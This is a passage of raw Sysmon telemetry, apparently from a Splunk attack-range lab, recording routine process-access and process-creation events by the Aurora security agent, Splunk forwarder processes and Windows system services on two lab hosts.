Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.545{FE4C2B44-E4C3-63C7-5406-00000000AF02}15126796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.382{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C3-63C7-5406-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.379{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E4C3-63C7-5406-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.379{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C3-63C7-5406-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.380{FE4C2B44-E4C3-63C7-5406-00000000AF02}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:32.934{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A000748EC8647E9064AB158A60A1C9A,SHA256=7CFAC6D5B1450D49D653B95FC76CFF74657D5713D1DF791045FA6C34C2EC34CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016944Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016943Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016942Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016941Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016940Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016939Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016938Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016937Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016936Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016935Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016934Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016933Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.967{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016932Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:32.968{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 